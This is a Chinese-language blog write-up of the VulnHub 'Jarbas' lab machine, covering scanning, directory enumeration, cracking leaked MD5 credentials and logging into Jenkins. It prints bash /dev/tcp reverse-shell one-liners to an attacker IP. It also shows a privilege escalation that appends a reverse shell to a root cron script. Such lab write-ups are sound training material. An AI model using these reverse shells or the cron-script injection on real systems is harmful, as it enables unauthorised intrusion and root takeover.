首页 > 其他分享 >Jarbas

Jarbas

时间:2023-04-06 14:45:22浏览次数:42  
标签:sbin http 239.132 00 192.168 Jarbas tcp

Jabrbas

地址:https://www.vulnhub.com/entry/jarbas-1,232/

1、主机发现

sudo nmap -sn 192.168.239.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:33 CST
Nmap scan report for 192.168.239.1
Host is up (0.00071s latency).
MAC Address: 00:50:56:C0:00:03 (VMware)
Nmap scan report for 192.168.239.132
Host is up (0.00063s latency).
MAC Address: 00:0C:29:34:B4:7F (VMware)
Nmap scan report for 192.168.239.254
Host is up (0.00010s latency).
MAC Address: 00:50:56:ED:A6:56 (VMware)
Nmap scan report for 192.168.239.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.01 seconds

2、端口扫描

  1. 扫描全端口

     nmap --min-rate 10000 -p- 192.168.239.132           
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:35 CST
    Nmap scan report for 192.168.239.132
    Host is up (0.0011s latency).
    Not shown: 65531 closed tcp ports (reset)
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    3306/tcp open  mysql
    8080/tcp open  http-proxy
    MAC Address: 00:0C:29:34:B4:7F (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 17.11 seconds
    

    再扫一遍

    ┌──(de1te㉿de1te)-[~]
    └─$ sudo nmap --min-rate 10000 -p- 192.168.239.132
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:36 CST
    Nmap scan report for 192.168.239.132
    Host is up (0.000067s latency).
    Not shown: 65531 closed tcp ports (reset)
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    3306/tcp open  mysql
    8080/tcp open  http-proxy
    MAC Address: 00:0C:29:34:B4:7F (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 14.89 seconds
    

    开放了 22,80,3306,8080 端口

  2. 查看开放端口的协议版本和系统版本

    sudo nmap -sT -sV -O -p 22,80,3306,8080 192.168.239.132
    
    Nmap scan report for 192.168.239.132
    Host is up (0.00040s latency).
    
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
    80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
    3306/tcp open  mysql   MariaDB (unauthorized)
    8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
    MAC Address: 00:0C:29:34:B4:7F (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 25.09 seconds
    
  3. 看看有啥简单漏洞

    sudo nmap --script=vuln -p 22,80,3306,8080 192.168.239.132
    
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:42 CST
    Nmap scan report for 192.168.239.132
    Host is up (0.00027s latency).
    
    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-trace: TRACE is enabled
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    | http-enum: 
    |_  /icons/: Potentially interesting folder w/ directory listing
    3306/tcp open  mysql
    8080/tcp open  http-proxy
    | http-enum: 
    |_  /robots.txt: Robots file
    MAC Address: 00:0C:29:34:B4:7F (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 38.03 seconds
    

    发现8080端口下有robots,看看有啥

    # we don't want robots to click "build" links
    User-agent: *
    Disallow: /
    

    没啥信息

总结一下:80和8080端口开着,首先看一下web方向吧

3、web方向

  1. 审一下网站

    80端口下:

    image

    8080端口下

    image

    一个登录页面,一般有三种方式获取登录账户和密码

    • 默认密码
    • 网站中存在泄露信息
    • 爆破
  2. 目录爆破

    sudo gobuster dir -u 192.168.239.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt   
    
    Gobuster v3.5
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://192.168.239.132
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.5
    [+] Timeout:                 10s
    ===============================================================
    2023/03/27 17:00:06 Starting gobuster in directory enumeration mode
    ===============================================================
    Progress: 20023 / 62285 (32.15%)[ERROR] 2023/03/27 17:00:09 [!] parse "http://192.168.239.132/error\x1f_log": net/url: invalid control character in URL
    Progress: 61964 / 62285 (99.48%)
    ===============================================================
    2023/03/27 17:00:14 Finished
    ===============================================================
    

    没啥东西,加几个文件后缀试一下

    sudo gobuster dir -u 192.168.239.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x html,php
    
    ===============================================================
    Gobuster v3.5
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://192.168.239.132
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.5
    [+] Extensions:              html,php
    [+] Timeout:                 10s
    ===============================================================
    2023/03/27 17:01:30 Starting gobuster in directory enumeration mode
    ===============================================================
    /index.html           (Status: 200) [Size: 32808]
    /access.html          (Status: 200) [Size: 359]
    /.html                (Status: 403) [Size: 207]
    Progress: 66397 / 186855 (35.53%)[ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/besalu\t.html": net/url: invalid control character in URL
    [ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/besalu\t.php": net/url: invalid control character in URL
    Progress: 70235 / 186855 (37.59%)[ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/error\x1f_log": net/url: invalid control character in URL
    [ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/error\x1f_log.html": net/url: invalid control character in URL
    [ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/error\x1f_log.php": net/url: invalid control character in URL
    /.html                (Status: 403) [Size: 207]
    /index.html           (Status: 200) [Size: 32808]
    /.html                (Status: 403) [Size: 207]
    Progress: 183153 / 186855 (98.02%)
    ===============================================================
    2023/03/27 17:01:54 Finished
    ===============================================================
    

    有个access.html 页面,看一下

    Creds encrypted in a safe way!
    
    tiago:5978a63b4654c73c60fa24f836386d87
    trindade:f463f63616cb3f1e81ce46b39f882fd5
    eder:9b38e2b1e8b12f426b0d208a7ab6cb98
    

    emm,后面想md5加密

    sudo hash-identifier '5978a63b4654c73c60fa24f836386d87'    
    
    Possible Hashs:
    [+] MD5
    [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
    

    果然是MD5

    解密一下

    5978a63b4654c73c60fa24f836386d87:italia99
    9b38e2b1e8b12f426b0d208a7ab6cb98:vipsu
    f463f63616cb3f1e81ce46b39f882fd5:marianna
    

    现在有了一下信息

    tiago : italia99
    trindade : vipsu
    eder : marianna
    

    都不行,排列组合一下

    eder vipsu 可以
    

    或者,集束炸弹爆破一下

    • burpsuite

      结果:

      image-20230327174323530

      eder---->vipsu

  3. jenkins 漏洞利用

    应该是这个:CVE-2019-10352

    漏洞利用:

    image

    image

    image

    反弹shell

    /bin/bash -i >& /dev/tcp/192.168.239.129/4444 0>&1
    

    开启端口监听:

    sudo nc -lvnp 4444
    

    获得反弹shell

    bash-4.2$ ls
    

4、提权

bash-4.2$ whoami  # 查看当前用户
whoami
jenkins
bash-4.2$ uname -a   # 查看系统版本
uname -a 
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ sudo -l   # 查看当前用户权限
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of oth ers.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
bash-4.2$ cat /etc/passwd  # 查看所以用户
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false

bash-4.2$ cat /etc/crontab  # 查看自动任务脚本
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1

# 查看自动任务脚本
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt


# 看看能不能写入
cho '/bin/bash -i >& /dev/tcp/192.168.239.129/4443 0>&1' >>/etc/script/CleaningScript.sh

成功:

┌──(de1te㉿de1te)-[~]                                                                                     │└─$ 
└─$ sudo nc -lvnp 4443                                                                                    │┌──(de1te㉿de1te)-[~]
[sudo] de1te 的密码:                                                                                     │└─$ ip a
listening on [any] 4443 ...                                                                               │1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
connect to [192.168.239.129] from (UNKNOWN) [192.168.239.132] 33726                                       │    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
bash: no job control in this shell                                                                        │    inet 127.0.0.1/8 scope host lo
[root@jarbas ~]#                                                                                          │       valid_lft forever preferred_lft forever
                                                                                                          │    inet6 ::1/128 scope host 
[root@jarbas ~]# ls                                                                                       │       valid_lft forever preferred_lft forever
ls                                                                                                        │2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
flag.txt                                                                                                  │    link/ether 00:0c:29:4c:a6:2d brd ff:ff:ff:ff:ff:ff
[root@jarbas ~]# cat flag.txt                                                                             │    inet 192.168.239.129/24 brd 192.168.239.255 scope global dynamic noprefixroute eth0
cat flag.txt                                                                                              │       valid_lft 903sec preferred_lft 903sec
Hey!                                                                                                      │    inet6 fe80::20c:29ff:fe4c:a62d/64 scope link noprefixroute 
                                                                                                          │       valid_lft forever preferred_lft forever
Congratulations! You got it! I always knew you could do it!                                               │                                                                                                        
This challenge was very easy, huh? =)                                                                     │┌──(de1te㉿de1te)-[~]
                                                                                                          │└─$ 
Thanks for appreciating this machine.                                                                     │
                                                                                                          │
@tiagotvrs                                                                                                │
[root@jarbas ~]#   

标签:sbin,http,239.132,00,192.168,Jarbas,tcp
From: https://www.cnblogs.com/nsqaq/p/17292660.html

相关文章

  • 红队渗透靶场之Jarbas靶场(超详细!)
    靶场考察点1.Jenkis平台的漏洞利用Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进......